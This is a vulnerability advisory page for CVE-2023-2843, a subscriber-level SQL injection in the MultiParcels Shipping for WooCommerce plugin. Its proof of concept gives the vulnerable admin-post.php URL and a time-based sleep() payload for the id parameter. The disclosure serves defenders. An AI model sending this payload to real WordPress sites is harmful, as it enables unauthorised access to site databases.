Lucene search
Dao Xuan HieuWPEX-ID:8E713EAF-F332-47E2-A131-C14222201FDCHistoryJul 17, 2023 - 12:00 a.m.
MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi
2023-07-1700:00:00
Dao Xuan Hieu
52
woocommerce plugin
multiparcels shipping
sql injection
subscriber user
admin-post request
vulnerable plugin
exploit
security vulnerability
Description The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. Note (WPScan): The issue was fixed in 1.14.13, however a better patch was done in 1.14.15 as per our suggestion.
1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required).
2. Login with Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=1
3. Inject payload to id parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=(select*from(select(sleep(10)))a) HTTP/1.1Related
cvelist
cvelist
nvd
nvd
CVE-2023-2843
2023-08-07 15:15:10
wpvulndb
wpvulndb
MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi
2023-07-17 00:00:00
prion
prion
Sql injection
2023-08-07 15:15:00
cve
cve
CVE-2023-2843
2023-08-07 15:15:10
wordfence
wordfence
9 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.9%
Related for WPEX-ID:8E713EAF-F332-47E2-A131-C14222201FDC